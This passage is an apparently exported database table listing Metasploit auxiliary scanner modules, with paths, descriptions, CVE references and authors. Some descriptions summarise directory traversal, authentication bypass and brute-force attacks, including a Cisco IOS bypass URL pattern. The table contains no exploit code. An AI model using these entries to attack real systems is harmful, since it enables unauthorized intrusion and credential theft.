services","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1440,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb","auxiliary","scanner/emc/alphastor_devicemanager","auxiliary/scanner/emc/alphastor_devicemanager","EMC AlphaStor Device Manager Service",300,"This module queries the remote host for the EMC Alphastor Device Management Service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"MC " 1441,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb","auxiliary","scanner/emc/alphastor_librarymanager","auxiliary/scanner/emc/alphastor_librarymanager","EMC AlphaStor Library Manager Service",300,"This module queries the remote host for the EMC Alphastor Library Management Service.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"MC " 1442,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/finger/finger_users.rb","auxiliary","scanner/finger/finger_users","auxiliary/scanner/finger/finger_users","Finger Service User Enumerator",300,"Identify valid users through the finger service using a variety of tricks","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1443,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ftp/anonymous.rb","auxiliary","scanner/ftp/anonymous","auxiliary/scanner/ftp/anonymous","Anonymous FTP Access Detection",300,"Detect anonymous (read/write) FTP server access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/File_Transfer_Protocol#Anonymous_FTP","Matteo Cantoni " 1444,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ftp/ftp_login.rb","auxiliary","scanner/ftp/ftp_login","auxiliary/scanner/ftp/ftp_login","FTP Authentication Scanner",300,"This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","todb " 1445,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ftp/ftp_version.rb","auxiliary","scanner/ftp/ftp_version","auxiliary/scanner/ftp/ftp_version","FTP Version Scanner",300,"Detect FTP Version.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1446,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb","auxiliary","scanner/ftp/titanftp_xcrc_traversal","auxiliary/scanner/ftp/titanftp_xcrc_traversal","Titan FTP XCRC Directory Traversal Information Disclosure",300,"This module exploits a directory traversal vulnreability in the XCRC command implemented in versions of Titan FTP up to and including 8.10.1125. By making sending multiple XCRC command, it is possible to disclose the contents of any file on the drive with a simple CRC ""brute force"" attack. Although the daemon runs with SYSTEM privileges, access is limited to files that reside on the same drive as the FTP server's root directory.","Metasploit Framework License (BSD)","f","2010-06-15 00:00:00",,,"aggressive","t","OSVDB-65533, URL-http://seclists.org/bugtraq/2010/Jun/160","Brandon McCann @zeknox , jduck " 1447,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/h323/h323_version.rb","auxiliary","scanner/h323/h323_version","auxiliary/scanner/h323/h323_version","H.323 Version Scanner",300,"Detect H.323 Version.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm " 1448,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/adobe_xml_inject.rb","auxiliary","scanner/http/adobe_xml_inject","auxiliary/scanner/http/adobe_xml_inject","Adobe XML External Entity Injection",300,"Multiple Adobe Products -- XML External Entity Injection. Affected Sofware: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-38197, CVE-2009-3960, OSVDB-62292, URL-http://www.adobe.com/support/security/bulletins/apsb10-05.html, URL-http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf","CG " 1449,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb","auxiliary","scanner/http/apache_activemq_source_disclosure","auxiliary/scanner/http/apache_activemq_source_disclosure","Apache ActiveMQ JSP files Source Disclosure",300,"This module exploits a source code disclosure in Apache ActiveMQ. The vulnerability is due to the Jetty's ResourceHandler handling of specially crafted URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.1 over Windows 2003 SP2 and Ubuntu 10.04.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-39636, CVE-2010-1587, OSVDB-64020, URL-https://issues.apache.org/jira/browse/AMQ-2700","Veerendra G.G, juan vazquez " 1450,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/apache_activemq_traversal.rb","auxiliary","scanner/http/apache_activemq_traversal","auxiliary/scanner/http/apache_activemq_traversal","Apache ActiveMQ Directory Traversal",300,"This module exploits a directory traversal vulnerability in Apache ActiveMQ 5.3.1 and 5.3.2 on Windows systems. The vulnerability exists in the Jetty's ResourceHandler installed with the affected versions. This module has been tested successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","OSVDB-86401, URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895, URL-https://issues.apache.org/jira/browse/amq-2788","AbdulAziz Hariri, juan vazquez " 1451,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/apache_userdir_enum.rb","auxiliary","scanner/http/apache_userdir_enum","auxiliary/scanner/http/apache_userdir_enum","Apache ""mod_userdir"" User Enumeration",300,"Apache with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-3335, CVE-2001-1013, OSVDB-637","Alligator Security Team, Heyder Andrade " 1452,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb","auxiliary","scanner/http/atlassian_crowd_fileaccess","auxiliary/scanner/http/atlassian_crowd_fileaccess","Atlassian Crowd XML Entity Expansion Remote File Access",300,"This module simply attempts to read a remote file from the server using a vulnerability in the way Atlassian Crowd handles XML files. The vulnerability occurs while trying to expand external entities with the SYSTEM identifier. This module has been tested successfully on Linux and Windows installations of Crowd.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-53595, CVE-2012-2926, OSVDB-82274, URL-https://confluence.atlassian.com/display/CROWD/Crowd+Security+Advisory+2012-05-17, URL-https://www.neg9.org","Thaddeus Bogner, Trevor Hartman, Will Caput, juan vazquez " 1453,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/axis_local_file_include.rb","auxiliary","scanner/http/axis_local_file_include","auxiliary/scanner/http/axis_local_file_include","Apache Axis2 v1.4.1 Local File Inclusion",300,"This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability. By loading a local XML file which contains a cleartext username and password, attackers can trivially recover authentication credentials to Axis services.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","EDB-12721, OSVDB-59001","==[ Alligator Security Team ]==, Tiago Ferreira " 1454,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/axis_login.rb","auxiliary","scanner/http/axis_login","auxiliary/scanner/http/axis_login","Apache Axis2 v1.4.1 Brute Force Utility",300,"This module attempts to login to an Apache Axis2 v1.4.1 instance using username and password combindations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2010-0219, OSVDB-68662","==[ Alligator Security Team ]==, Leandro Oliveira " 1455,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/backup_file.rb","auxiliary","scanner/http/backup_file","auxiliary/scanner/http/backup_file","HTTP Backup File Scanner",300,"This module identifies the existence of possible copies of a specific file in a given path.","BSD License","f",,,,"aggressive","t",,"et " 1456,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb","auxiliary","scanner/http/barracuda_directory_traversal","auxiliary/scanner/http/barracuda_directory_traversal","Barracuda Multiple Product ""locale"" Directory Traversal",300,"This module exploits a directory traversal vulnerability present in serveral Barracuda products, including the Barracuda Spam and Virus Firewall, Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default, this module will attempt to download the Barracuda configuration file.","Metasploit Framework License (BSD)","f","2010-10-08 00:00:00",,,"aggressive","t","EDB-15130, OSVDB-68301, URL-http://secunia.com/advisories/41609/","==[ Alligator Security Team ]==, Tiago Ferreira " 1457,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb","auxiliary","scanner/http/bitweaver_overlay_type_traversal","auxiliary/scanner/http/bitweaver_overlay_type_traversal","Bitweaver overlay_type Directory Traversal",300,"This module exploits a directory traversal vulnerability found in Bitweaver. When hanlding the 'overlay_type' parameter, view_overlay.php fails to do any path checking/filtering, which can be abused to read any file outside the virtual directory.","Metasploit Framework License (BSD)","f","2012-10-23 00:00:00",,,"aggressive","t","CVE-2012-5192, EDB-22216, OSVDB-86599, URL-https://www.trustwave.com/spiderlabs/advisories/TWSL2012-016.txt","David Aaron, Jonathan Claudius, sinn3r " 1458,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/blind_sql_query.rb","auxiliary","scanner/http/blind_sql_query","auxiliary/scanner/http/blind_sql_query","HTTP Blind SQL Injection Scanner",300,"This module identifies the existence of Blind SQL injection issues in GET/POST Query parameters values.","BSD License","f",,,,"aggressive","t",,"et " 1459,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/brute_dirs.rb","auxiliary","scanner/http/brute_dirs","auxiliary/scanner/http/brute_dirs","HTTP Directory Brute Force Scanner",300,"This module identifies the existence of interesting directories by brute forcing the name in a given directory path.","BSD License","f",,,,"aggressive","t",,"et " 1460,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/cert.rb","auxiliary","scanner/http/cert","auxiliary/scanner/http/cert","HTTP SSL Certificate Checker",300,"This module will check the certificate of the specified web servers to ensure the subject and issuer match the supplied pattern and that the certificate is not expired. Note: Be sure to check your expression if using msfcli, shells tend to not like certain things and will strip/interpret them (= is a perfect example). It is better to use in console.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"nebulus" 1461,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/cisco_device_manager.rb","auxiliary","scanner/http/cisco_device_manager","auxiliary/scanner/http/cisco_device_manager","Cisco Device HTTP Device Manager Access",300,"This module gathers data from a Cisco device (router or switch) with the device manager web interface exposed. The USERNAME and PASSWORD options can be used to specify authentication.","Metasploit Framework License (BSD)","f","2000-10-26 00:00:00",,,"aggressive","t","BID-1846, CVE-2000-0945, OSVDB-444","hdm " 1462,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/cisco_ios_auth_bypass.rb","auxiliary","scanner/http/cisco_ios_auth_bypass","auxiliary/scanner/http/cisco_ios_auth_bypass","Cisco IOS HTTP Unauthorized Administrative Access",300,"This module exploits a vulnerability in the Cisco IOS HTTP Server. By sending a GET request for ""/level/num/exec/.."", where num is between 16 and 99, it is possible to bypass authentication and obtain full system control. IOS 11.3 -> 12.2 are reportedly vulnerable. This module tested successfully against a Cisco 1600 Router IOS v11.3(11d).","Metasploit Framework License (BSD)","f","2001-06-27 00:00:00",,,"aggressive","t","BID-2936, CVE-2001-0537, OSVDB-578, URL-http://www.cisco.com/warp/public/707/cisco-sa-20010627-ios-http-level.shtml","Patrick Webster , hdm " 1463,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb","auxiliary","scanner/http/cisco_nac_manager_traversal","auxiliary/scanner/http/cisco_nac_manager_traversal","Cisco Network Access Manager Directory Traversal Vulnerability",300,"This module tests whether a directory traversal vulnerablity is present in versions of Cisco Network Access Manager 4.8.x You may wish to change FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2011-3305, OSVDB-76080, URL-http://dev.metasploit.com/redmine/issues/5673, URL-http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml","Nenad Stojanovski " 1464,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/clansphere_traversal.rb","auxiliary","scanner/http/clansphere_traversal","auxiliary/scanner/http/clansphere_traversal","ClanSphere 2011.3 Local File Inclusion Vulnerability",300,"This module exploits a directory traversal flaw found in Clansphere 2011.3. The application fails to handle the cs_lang parameter properly, which can be used to read any file outside the virtual directory.","Metasploit Framework License (BSD)","f","2012-10-23 00:00:00",,,"aggressive","t","EDB-22181, OSVDB-86720","blkhtc0rp, sinn3r " 1465,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/cold_fusion_version.rb","auxiliary","scanner/http/cold_fusion_version","auxiliary/scanner/http/cold_fusion_version","ColdFusion Version Scanner",300,"This module attempts identify various flavors of ColdFusion up to version 10 as well as the underlying OS.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"nebulus, sinn3r " 1466,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/coldfusion_locale_traversal.rb","auxiliary","scanner/http/coldfusion_locale_traversal","auxiliary/scanner/http/coldfusion_locale_traversal","ColdFusion Server Check",300,"This module attempts to exploit the directory traversal in the 'locale' attribute. According to the advisory the following versions are vulnerable: ColdFusion MX6 6.1 base patches, ColdFusion MX7 7,0,0,91690 base patches, ColdFusion MX8 8,0,1,195765 base patches, ColdFusion MX8 8,0,1,195765 with Hotfix4. Adobe released patches for ColdFusion 8.0, 8.0.1, and 9 but ColdFusion 9 is reported to have directory traversal protections in place, subsequently this module does NOT work against ColdFusion 9. Adobe did not release patches for ColdFusion 6.1 or ColdFusion 7. It is not recommended to set FILE when doing scans across a group of servers where the OS may vary; otherwise, the file requested may not make sense for the OS","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-42342, CVE-2010-2861, OSVDB-67047, URL-http://www.adobe.com/support/security/bulletins/apsb10-18.html, URL-http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861, URL-http://www.procheckup.com/vulnerability_manager/vulnerabilities/pr10-07","CG , nebulus" 1467,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/concrete5_member_list.rb","auxiliary","scanner/http/concrete5_member_list","auxiliary/scanner/http/concrete5_member_list","Concrete5 Member List Enumeration",300,"This module extracts username information from the Concrete5 member page","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://blog.c22.cc, URL-http://www.concrete5.org, URL-http://www.concrete5.org/documentation/using-concrete5/dashboard/users-and-groups/","Chris John Riley" 1468,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/copy_of_file.rb","auxiliary","scanner/http/copy_of_file","auxiliary/scanner/http/copy_of_file","HTTP Copy File Scanner",300,"This module identifies the existence of possible copies of a specific file in a given path.","BSD License","f",,,,"aggressive","t",,"et " 1469,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/crawler.rb","auxiliary","scanner/http/crawler","auxiliary/scanner/http/crawler","Web Site Crawler",300,"Crawl a web site and store information about what was found","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"hdm , tasos" 1470,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dell_idrac.rb","auxiliary","scanner/http/dell_idrac","auxiliary/scanner/http/dell_idrac","Dell iDRAC default Login",300,"This module attempts to login to a iDRAC webserver instance using default username and password. Tested against Dell Remote Access Controller 6 - Express version 1.50 and 1.85","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","Cristiano Maruti " 1471,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dir_listing.rb","auxiliary","scanner/http/dir_listing","auxiliary/scanner/http/dir_listing","HTTP Directory Listing Scanner",300,"This module identifies directory listing vulnerabilities in a given directory path.","BSD License","f",,,,"aggressive","t",,"et " 1472,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dir_scanner.rb","auxiliary","scanner/http/dir_scanner","auxiliary/scanner/http/dir_scanner","HTTP Directory Scanner",300,"This module identifies the existence of interesting directories in a given directory path.","BSD License","f",,,,"aggressive","t",,"et " 1473,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb","auxiliary","scanner/http/dir_webdav_unicode_bypass","auxiliary/scanner/http/dir_webdav_unicode_bypass","MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner",300,"This module is based on et's HTTP Directory Scanner module, with one exception. Where authentication is required, it attempts to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. The vulnerability appears to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-34993, CVE-2009-1122, CVE-2009-1535, MSB-MS09-020, OSVDB-54555","patrick " 1474,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb","auxiliary","scanner/http/dlink_dir_300_615_http_login","auxiliary/scanner/http/dlink_dir_300_615_http_login","DLink DIR-300A / DIR-320 / DIR-615D HTTP Login Utility",300,"This module attempts to authenticate to different DLink HTTP management services. It has been tested on D-Link DIR-300 Hardware revision A, D-Link DIR-615 Hardware revision D and D-Link DIR-320 devices. It is possible that this module also works with other models.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","Michael Messner , hdm " 1475,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb","auxiliary","scanner/http/dlink_dir_615h_http_login","auxiliary/scanner/http/dlink_dir_615h_http_login","DLink DIR-615H HTTP Login Utility",300,"This module attempts to authenticate to different DLink HTTP management services. It has been tested successfully on D-Link DIR-615 Hardware revision H devices. It is possible that this module also works with other models.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","Michael Messner , hdm " 1476,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb","auxiliary","scanner/http/dlink_dir_session_cgi_http_login","auxiliary/scanner/http/dlink_dir_session_cgi_http_login","DLink DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility",300,"This module attempts to authenticate to different DLink HTTP management services. It has been tested successfully on D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645 Hardware revision A devices.It is possible that this module also works with other models.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-1999-0502","Michael Messner , hdm " 1477,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/dolibarr_login.rb","auxiliary","scanner/http/dolibarr_login","auxiliary/scanner/http/dolibarr_login","Dolibarr ERP & CRM 3 Login Utility",300,"This module attempts to authenticate to a Dolibarr ERP/CRM's admin web interface, and should only work against version 3.1.1 or older, because these versions do not have any default protections against bruteforcing.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"sinn3r " 1478,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/drupal_views_user_enum.rb","auxiliary","scanner/http/drupal_views_user_enum","auxiliary/scanner/http/drupal_views_user_enum","Drupal Views Module Users Enumeration",300,"This module exploits an information disclosure vulnerability in the 'Views' module of Drupal, brute-forcing the first 10 usernames from 'a' to 'z'","Metasploit Framework License (BSD)","f","2010-07-02 00:00:00",,,"aggressive","t","URL-http://www.madirish.net/node/465","Brandon McCann ""zeknox"" , Justin Klein Keane, Robin Francois " 1479,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/ektron_cms400net.rb","auxiliary","scanner/http/ektron_cms400net","auxiliary/scanner/http/ektron_cms400net","Ektron CMS400.NET Default Password Scanner",300,"Ektron CMS400.NET is a web content management system based on .NET. This module tests for installations that are utilizing default passwords set by the vendor. Additionally, it has the ability to brute force user accounts. Note that Ektron CMS400.NET, by default, enforces account lockouts for regular user account after a number of failed attempts.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Justin Cacak" 1480,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/enum_wayback.rb","auxiliary","scanner/http/enum_wayback","auxiliary/scanner/http/enum_wayback","Archive.org Stored Domain URLs",300,"This module pulls and parses the URLs stored by Archive.org for the purpose of replaying during a web assessment. Finding unlinked and old pages.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"mubix " 1481,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/error_sql_injection.rb","auxiliary","scanner/http/error_sql_injection","auxiliary/scanner/http/error_sql_injection","HTTP Error Based SQL Injection Scanner",300,"This module identifies the existence of Error Based SQL injection issues. Still requires alot of work","BSD License","f",,,,"aggressive","t",,"et " 1482,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/file_same_name_dir.rb","auxiliary","scanner/http/file_same_name_dir","auxiliary/scanner/http/file_same_name_dir","HTTP File Same Name Directory Scanner",300,"This module identifies the existence of files in a given directory path named as the same name of the directory. Only works if PATH is differenet than '/'.","BSD License","f",,,,"aggressive","t",,"et " 1483,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/files_dir.rb","auxiliary","scanner/http/files_dir","auxiliary/scanner/http/files_dir","HTTP Interesting File Scanner",300,"This module identifies the existence of interesting files in a given directory path.","BSD License","f",,,,"aggressive","t",,"et " 1484,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/frontpage_login.rb","auxiliary","scanner/http/frontpage_login","auxiliary/scanner/http/frontpage_login","FrontPage Server Extensions Anonymous Login Scanner",300,"This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","URL-http://en.wikipedia.org/wiki/Microsoft_FrontPage, URL-http://msdn2.microsoft.com/en-us/library/ms454298.aspx","Matteo Cantoni " 1485,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/glassfish_login.rb","auxiliary","scanner/http/glassfish_login","auxiliary/scanner/http/glassfish_login","GlassFish Brute Force Utility",300,"This module attempts to login to GlassFish instance using username and password combindations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","CVE-2011-0807, OSVDB-71948","Joshua Abraham " 1486,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb","auxiliary","scanner/http/groupwise_agents_http_traversal","auxiliary/scanner/http/groupwise_agents_http_traversal","Novell Groupwise Agents HTTP Directory Traversal",300,"This module exploits a directory traversal vulnerability in Novell Groupwise. The vulnerability exists in the web interface of both the Post Office and the MTA agents. This module has been tested successfully on Novell Groupwise 8.02 HP2 over Windows 2003 SP2.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-55648, CVE-2012-0419, OSVDB-85801, URL-http://www.novell.com/support/kb/doc.php?id=7010772","juan vazquez , r () b13$" 1487,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb","auxiliary","scanner/http/hp_imc_faultdownloadservlet_traversal","auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal","HP Intelligent Management FaultDownloadServlet Directory Traversal",300,"This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the FaultDownloadServlet, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-58675, CVE-2012-5202, OSVDB-91027, URL-http://www.zerodayinitiative.com/advisories/ZDI-13-051/","juan vazquez , rgod " 1488,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb","auxiliary","scanner/http/hp_imc_ictdownloadservlet_traversal","auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal","HP Intelligent Management IctDownloadServlet Directory Traversal",300,"This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the IctDownloadServlet, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-58676, CVE-2012-5204, OSVDB-91029, URL-http://www.zerodayinitiative.com/advisories/ZDI-13-053/","juan vazquez , rgod " 1489,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb","auxiliary","scanner/http/hp_imc_reportimgservlt_traversal","auxiliary/scanner/http/hp_imc_reportimgservlt_traversal","HP Intelligent Management ReportImgServlt Directory Traversal",300,"This module exploits a lack of authentication and a directory traversal in HP Intelligent Management, specifically in the ReportImgServlt, in order to retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-58672, CVE-2012-5203, OSVDB-91028, URL-http://www.zerodayinitiative.com/advisories/ZDI-13-052/","juan vazquez , rgod " 1490,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb","auxiliary","scanner/http/hp_sitescope_getfileinternal_fileaccess","auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess","HP SiteScope SOAP Call getFileInternal Remote File Access",300,"This module exploits an authentication bypass vulnerability in HP SiteScope to retrieve an arbitrary file from the remote server. It is accomplished by calling the getFileInternal operation available through the APISiteScopeImpl AXIS service. This module has been successfully tested on HP SiteScope 11.20 over Windows 2003 SP2 and Linux Centos 6.3.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-55269, OSVDB-85119, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-176/","juan vazquez , rgod " 1491,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb","auxiliary","scanner/http/hp_sitescope_getsitescopeconfiguration","auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration","HP SiteScope SOAP Call getSiteScopeConfiguration Configuration Access",300,"This module exploits an authentication bypass vulnerability in HP SiteScope which allows to retrieve the HP SiteScope configuration, including administrative credentials. It is accomplished by calling the getSiteScopeConfiguration operation available through the APISiteScopeImpl AXIS service. The HP SiteScope Configuration is retrieved as file containing Java serialization data. This module has been tested successfully on HP SiteScope 11.20 over Windows 2003 SP2 and Linux Centos 6.3.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-55269, OSVDB-85120, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-173/","juan vazquez , rgod " 1492,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb","auxiliary","scanner/http/hp_sitescope_loadfilecontent_fileaccess","auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess","HP SiteScope SOAP Call loadFileContent Remote File Access",300,"This module exploits an authentication bypass vulnerability in HP SiteScope to retrieve an arbitrary text file from the remote server. It is accomplished by calling the loadFileContent operation available through the APIMonitorImpl AXIS service. This module has been successfully tested on HP SiteScope 11.20 over Windows 2003 SP2 and Linux Centos 6.3.","Metasploit Framework License (BSD)","f",,,,"aggressive","t","BID-55269, OSVDB-85118, URL-http://www.zerodayinitiative.com/advisories/ZDI-12-177/","juan vazquez , rgod " 1493,"2013-05-24 08:19:45","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/http_hsts.rb","auxiliary","scanner/http/http_hsts","auxiliary/scanner/http/http_hsts","HTTP Strict Transport Security (HSTS) Detection",300,"Display HTTP Strict Transport Security (HSTS) information about each system.","Metasploit Framework License (BSD)","f",,,,"aggressive","t",,"Matt ""hostess"" Andreko " 1494,"2013-05-29 16:42:01","/opt/metasploit/apps/pro/msf3/modules/auxiliary/scanner/http/http_login.rb","auxiliary","scanner/http/http_login","auxiliary/scanner/http/http_login","HTTP Login Utility",300,"This module attempts to authenticate to an HTTP service.","Metasploit Framework License 